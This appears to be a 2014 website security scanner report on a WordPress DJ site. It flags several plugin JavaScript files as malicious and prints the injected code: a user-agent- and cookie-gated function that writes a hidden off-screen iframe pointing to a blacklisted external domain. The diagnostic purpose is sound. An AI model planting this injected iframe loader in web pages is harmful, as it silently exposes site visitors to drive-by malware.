Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=djladykate.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://djladykate.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 06:15:24 GMT Via: 1.1 varnish Age: 0 Location: http://www.djladykate.com/ Server: nginx/1.6.2 Vary: User-Agent,Accept-Encoding Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Pingback: http://www.djladykate.com/xmlrpc.php X-Varnish: 618948267 | clean |
http://www.djladykate.com/ | 200 OK Content-Length: 62144 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.clubhouseradio.us <!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1"> <link rel="dns-prefetch" href="http://ajax.googleapis.com" /> <link rel="alte ...[4290 bytes skipped]... | ||
http://www.djladykate.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/anti-spam/js/anti-spam.js?ver=2.2 | 200 OK Content-Length: 1850 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/instapress/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 17863 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: distancer.48ecofilm.com ...[248 bytes skipped]... ined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1); var assa_a = (getCookie("ultras17broser") === undefined); if (!Smiledbob && assa_a) { document.write('<iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>'); var date = new Date( new Date().getTime() + 65*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Lightebrothermind(); ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0 ...[3143 bytes skipped]... Decoded script: <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe> Malicious iFrame found. size: 200x200 src: http://distancer.48ecofilm.com/dirmanoulita16.html This URL is marked by Google as suspicious <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://www.djladykate.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&ver=4.0 | 200 OK Content-Length: 94880 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&ver=4.0 | 200 OK Content-Length: 111127 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/simply-instagram/js/simply-instagram-jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 26931 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: distancer.48ecofilm.com ...[248 bytes skipped]... ined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1); var assa_a = (getCookie("ultras17broser") === undefined); if (!Smiledbob && assa_a) { document.write('<iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>'); var date = new Date( new Date().getTime() + 65*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Lightebrothermind(); (function($){$.prettyPhoto={version:"3.1. ...[3029 bytes skipped]... Decoded script: <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe> Malicious iFrame found. size: 200x200 src: http://distancer.48ecofilm.com/dirmanoulita16.html This URL is marked by Google as suspicious <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://www.djladykate.com/wp-content/plugins/zilla-likes/scripts/zilla-likes.js?ver=4.0 | 200 OK Content-Length: 722 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6 | 200 OK Content-Length: 31605 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: distancer.48ecofilm.com ...[248 bytes skipped]... ined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1); var assa_a = (getCookie("ultras17broser") === undefined); if (!Smiledbob && assa_a) { document.write('<iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>'); var date = new Date( new Date().getTime() + 65*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Lightebrothermind(); var audioplayer_swfobject = function() {< ...[3399 bytes skipped]... Decoded script: function callDomLoadFunctions() { if (isDomLoaded) { return; } try { var t = doc.getElementsByTagName("body")[0].appendChild(createElement("span")); t.parentNode.removeChild(t); } catch (e) { return; } isDomLoaded = true; var dl = domLoadFnArr.length; for (var i = 0; i < dl; i++) { domLoadFnArr[i](); } } <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe> Malicious iFrame found. size: 200x200 src: http://distancer.48ecofilm.com/dirmanoulita16.html This URL is marked by Google as suspicious <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://www.djladykate.com/wp-content/plugins/no-right-click-images-plugin/no-right-click-images.js | 200 OK Content-Length: 9576 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[248 bytes skipped]... ined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1); var assa_a = (getCookie("ultras17broser") === undefined); if (!Smiledbob && assa_a) { document.write('<iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>'); var date = new Date( new Date().getTime() + 65*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Lightebrothermind(); var kpg_nrci_targImg=null; var ...[3294 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 200x200 src: http://distancer.48ecofilm.com/dirmanoulita16.html This URL is marked by Google as suspicious <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://www.djladykate.com/wp-content/plugins/youtube-sidebar-widget/script.js | 200 OK Content-Length: 3799 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: distancer.48ecofilm.com ...[248 bytes skipped]... ined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1); var assa_a = (getCookie("ultras17broser") === undefined); if (!Smiledbob && assa_a) { document.write('<iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>'); var date = new Date( new Date().getTime() + 65*60*60*1000 ); document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString(); } } Lightebrothermind(); (function(){ jQuery(function($){ ...[1735 bytes skipped]... Decoded script: <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe> Malicious iFrame found. size: 200x200 src: http://distancer.48ecofilm.com/dirmanoulita16.html This URL is marked by Google as suspicious <iframe src="http://distancer.48ecofilm.com/dirmanoulita16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://www.djladykate.com/wp-content/plugins/instapress/instapress.js?ver=1.5.4 | 200 OK Content-Length: 4570 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-content/plugins/wp-lightbox-2/wp-lightbox-2.min.js?ver=1.3.4.1 | 200 OK Content-Length: 10630 Content-Type: application/javascript | clean |
http://www.djladykate.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: djladykate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 19 Sep 2014 06:15:24 GMT
Via: 1.1 varnish
Age: 0
Location: http://www.djladykate.com/
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS
X-Pingback: http://www.djladykate.com/xmlrpc.php
X-Varnish: 618948267
GET / HTTP/1.1
Host: djladykate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 19 Sep 2014 06:15:24 GMT
Via: 1.1 varnish
Age: 0
Location: http://www.djladykate.com/
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS
X-Pingback: http://www.djladykate.com/xmlrpc.php
X-Varnish: 618948267
Second query (visit from search engine):
GET / HTTP/1.1
Host: djladykate.com
Referer: http://www.google.com/search?q=djladykate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: djladykate.com
Referer: http://www.google.com/search?q=djladykate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.